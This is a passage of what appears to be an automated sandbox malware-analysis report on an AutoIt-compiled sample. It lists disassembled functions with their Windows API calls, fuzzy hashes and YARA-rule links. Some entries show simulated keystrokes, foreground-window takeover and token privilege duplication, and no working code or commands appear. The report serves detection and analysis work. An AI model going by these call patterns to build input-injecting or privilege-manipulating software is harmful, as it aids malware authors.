                                          • Part of subcall function 00E84CC8: FreeLibrary.KERNEL32(00000000), ref: 00E84D02
                                          • Part of subcall function 00E84DD0: _memmove.LIBCMT ref: 00E84E1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Library$Free$Load__wfsopen_memmove
                                        • String ID:
                                        • API String ID: 1396898556-0
                                        • Opcode ID: 590508a0814f5be5d46bd5fbda0d638d27071b72629f289a2068b04480abaaf4
                                        • Instruction ID: 70b6a1bcd8fd7d3b7791563f3bca790b68ba92cb43ed0e4aa2673f6ff37a63f7
                                        • Opcode Fuzzy Hash: 590508a0814f5be5d46bd5fbda0d638d27071b72629f289a2068b04480abaaf4
                                        • Instruction Fuzzy Hash: 9611B27264030AAACB20FF60CC12FAEB7E9DB44704F14942DF549B61C1DA759A059B50
                                        Function 00EC01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 98477f6c13479f472a891d1acde9273e4edb668085532648d672932bdab9729f
                                        • Instruction ID: 048b076df92a3b5ad14ee90a6c7f66295dad727c776beccb35babed2b85be1a2
                                        • Opcode Fuzzy Hash: 98477f6c13479f472a891d1acde9273e4edb668085532648d672932bdab9729f
                                        • Instruction Fuzzy Hash: 682146B4508341CFDB24EF14C484B1ABBE0BF88304F0999ACE89A67762D731F845DB52
                                        Function 00EA4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • __lock_file.LIBCMT ref: 00EA4AD6
                                          • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit__lock_file
                                        • String ID:
                                        • API String ID: 2597487223-0
                                        • Opcode ID: ccbd6f59fc0d41c16d15f2edbbec8d74f6a6e1fd7e1d8340aa88eb6ce018fcda
                                        • Instruction ID: 2d719e5b373eb97d48502f08493129d1f9fc1107b3a924c1a012897f9022078b
                                        • Opcode Fuzzy Hash: ccbd6f59fc0d41c16d15f2edbbec8d74f6a6e1fd7e1d8340aa88eb6ce018fcda
                                        • Instruction Fuzzy Hash: 2BF0F4719002099BDF61AFA48C067DF3AE0AF8A329F049114B414BE0D1DBB8AA20DF51
                                        Function 00E84FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84FDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 6e548bd54d41f3f2ba56e4fa86e822e6f9eba4b9385b7db2fb898b687ca56732
                                        • Instruction ID: 33c18f25d9643112011aebebdb7400740d93d19b08a671557feb4aa7d044930f
                                        • Opcode Fuzzy Hash: 6e548bd54d41f3f2ba56e4fa86e822e6f9eba4b9385b7db2fb898b687ca56732
                                        • Instruction Fuzzy Hash: 6DF030B1605712CFCB34AF64D494852BBE1FF15329320AA3EE6DE92650C731A844DF40
                                        Function 00EA09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EA09F4
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LongNamePath_memmove
                                        • String ID:
                                        • API String ID: 2514874351-0
                                        • Opcode ID: 9c69435bc7a54f2644030b3bcb0cdde8d0bfdaefb365b0df607371a450662413
                                        • Instruction ID: 77dae36622688674620f11678edcc728b209027a0cd8744cce172a119bd69cfc
                                        • Opcode Fuzzy Hash: 9c69435bc7a54f2644030b3bcb0cdde8d0bfdaefb365b0df607371a450662413
                                        • Instruction Fuzzy Hash: FFE0CD3690422C5BC720E6589C05FFA77EDDF897A0F0501F5FC4CD7245D960AC818690
                                        Function 00EE9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                        • Instruction ID: 1e6af42643a9e86f3490ec0b5873547e5be0e7cd4390ed27a99972dc4c0aab7d
                                        • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                        • Instruction Fuzzy Hash: FBE092B1104B845FD7388A24D8107E373E0BB06319F01081CF29A93342EB6278418759
                                        Function 011906C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?), ref: 011906D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                        • Instruction ID: 8b02ddbfc90f8f00e8b1dfc7c2af76751b01539b02393f9672111498778b53ac
                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                        • Instruction Fuzzy Hash: 22E08C31945208EBDF18CAAC8908AAD77ACAB48320F604658BA26C3280D7309A10D691
                                        Function 01190698 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?), ref: 011906A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                        • Instruction ID: 8f5be444154d2b48d7b9d7d6cc858f02454a72e0d506110e408e44e3baf5ee5f
                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                        • Instruction Fuzzy Hash: F8D05E7190A20CABCB14DAA8990499973AC9709320F104755F92583280D73199009790
                                        Function 00EA548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __wfsopen
                                        • String ID:
                                        • API String ID: 197181222-0
                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                        • Instruction ID: ce4d43c0187b3eb251c6ee7cc1ccf72041cb1339467cc9feb3ef39b460eef218
                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                        • Instruction Fuzzy Hash: 71B0927684020C7BDE012E82EC02A593F599B49678F808020FB1C2C162A673A6A09689
                                        Function 01192094 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 011920A9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                        • Instruction ID: fd4de7a91d3498f6d963831f3da6c0f2b47ea747f685a1f484cc7db47e3cb128
                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                        • Instruction Fuzzy Hash: 27E09A7494020DAFDB14DFA4D54969D7BB4EF04301F1005A1FD0597680DB309A548A62
                                        Function 01192098 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 011920A9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction ID: 97f106d8b7ab05d8b31213d8b6b5b14840cceb51e06b29d1e8da411d133140d9
                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction Fuzzy Hash: B2E0BF7494020DAFDB00DFA4D54969D7BB4EF04301F100161FD0192280D73099508A62

                                        Non-executed Functions

                                        Function 00F0CDAC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 637windowkeyboardnativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00F0CE50
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0CE91
                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F0CED6
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0CF00
                                        • SendMessageW.USER32 ref: 00F0CF29
                                        • _wcsncpy.LIBCMT ref: 00F0CFA1
                                        • GetKeyState.USER32(00000011), ref: 00F0CFC2
                                        • GetKeyState.USER32(00000009), ref: 00F0CFCF
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0CFE5
                                        • GetKeyState.USER32(00000010), ref: 00F0CFEF
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0D018
                                        • SendMessageW.USER32 ref: 00F0D03F
                                        • SendMessageW.USER32(?,00001030,?,00F0B602), ref: 00F0D145
                                        • SetCapture.USER32(?), ref: 00F0D177
                                        • ClientToScreen.USER32(?,?), ref: 00F0D1DC
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F0D203
                                        • ReleaseCapture.USER32 ref: 00F0D20E
                                        • GetCursorPos.USER32(?), ref: 00F0D248
                                        • ScreenToClient.USER32(?,?), ref: 00F0D255
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0D2B1
                                        • SendMessageW.USER32 ref: 00F0D2DF
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0D31C
                                        • SendMessageW.USER32 ref: 00F0D34B
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F0D36C
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F0D37B
                                        • GetCursorPos.USER32(?), ref: 00F0D39B
                                        • ScreenToClient.USER32(?,?), ref: 00F0D3A8
                                        • GetParent.USER32(?), ref: 00F0D3C8
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0D431
                                        • SendMessageW.USER32 ref: 00F0D462
                                        • ClientToScreen.USER32(?,?), ref: 00F0D4C0
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F0D4F0
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0D51A
                                        • SendMessageW.USER32 ref: 00F0D53D
                                        • ClientToScreen.USER32(?,?), ref: 00F0D58F
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F0D5C3
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F0D65F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 302779176-4164748364
                                        • Opcode ID: 58d0fcc49ab14346b90b66d9839e5053893fdbd36a31efc0000967101da17e19
                                        • Instruction ID: d0c9f227522888484f0c26746cbfb13e6f8ef33665f793e37113122bb624d6d2
                                        • Opcode Fuzzy Hash: 58d0fcc49ab14346b90b66d9839e5053893fdbd36a31efc0000967101da17e19
                                        • Instruction Fuzzy Hash: 2742BB34604345AFDB21CF68C844BAABBE5FF49324F14062DFA99972E1C7319845FB92
                                        Function 00F0804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F0873F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 3850602802-328681919
                                        • Opcode ID: c102158dea76a06d1763338edcda160edfe1e04ad52c3b4de228786a4c82efd8
                                        • Instruction ID: c0ddcb42909fd4c2ffecbf32f8550b3db070e286716eab80214823d17f250fdc
                                        • Opcode Fuzzy Hash: c102158dea76a06d1763338edcda160edfe1e04ad52c3b4de228786a4c82efd8
                                        • Instruction Fuzzy Hash: 7412C271900208ABEB258F24CC49FAA7BF4EF497A0F144169F955EB2E1DF709946FB10
                                        Function 00E9710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove$_memset
                                        • String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                        • API String ID: 1357608183-2202602582
                                        • Opcode ID: bf2f2ed47a1fb01af05ee76deb2fc9c3e1cb5dda1eb798ee98067b5f2fa752e1
                                        • Instruction ID: 6e197104b9b3f1f8a6382eee662455844cd49278733b30b8c96cd713b0745e76
                                        • Opcode Fuzzy Hash: bf2f2ed47a1fb01af05ee76deb2fc9c3e1cb5dda1eb798ee98067b5f2fa752e1
                                        • Instruction Fuzzy Hash: 42938F75A002199BDF24CF68C881BADB7B1FF58314F25916BE955BB390E7709E82CB40
                                        Function 00E84A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,?), ref: 00E84A3D
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EBDA8E
                                        • IsIconic.USER32(?), ref: 00EBDA97
                                        • ShowWindow.USER32(?,00000009), ref: 00EBDAA4
                                        • SetForegroundWindow.USER32(?), ref: 00EBDAAE
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EBDAC4
                                        • GetCurrentThreadId.KERNEL32 ref: 00EBDACB
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EBDAD7
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAE8
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAF0
                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EBDAF8
                                        • SetForegroundWindow.USER32(?), ref: 00EBDAFB
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB10
                                        • keybd_event.USER32(00000012,00000000), ref: 00EBDB1B
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB25
                                        • keybd_event.USER32(00000012,00000000), ref: 00EBDB2A
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB33
                                        • keybd_event.USER32(00000012,00000000), ref: 00EBDB38
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB42
                                        • keybd_event.USER32(00000012,00000000), ref: 00EBDB47
                                        • SetForegroundWindow.USER32(?), ref: 00EBDB4A
                                        • AttachThreadInput.USER32(?,?,00000000), ref: 00EBDB71
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: 4a48492040696d2c880dbcd899a75879749ad76e3dc50d3ada39a00b4048c549
                                        • Instruction ID: 1888583dde6f162ba72e6313a87d5e1f03a11dfeca6baeb2bc2c3fe967453231
                                        • Opcode Fuzzy Hash: 4a48492040696d2c880dbcd899a75879749ad76e3dc50d3ada39a00b4048c549
                                        • Instruction Fuzzy Hash: C6316271A4031CBBEB316FA19C89FBF7E6CEB44B50F154025FA04EA1D0D6B15910BBA1
                                        Function 00ED8858 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 224COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00ED8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                                          • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                                          • Part of subcall function 00ED8CC3: GetLastError.KERNEL32 ref: 00ED8D47
                                        • _memset.LIBCMT ref: 00ED889B
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ED88ED
                                        • CloseHandle.KERNEL32(?), ref: 00ED88FE
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ED8915
                                        • GetProcessWindowStation.USER32 ref: 00ED892E
                                        • SetProcessWindowStation.USER32(00000000), ref: 00ED8938
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ED8952
                                          • Part of subcall function 00ED8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ED8851), ref: 00ED8728
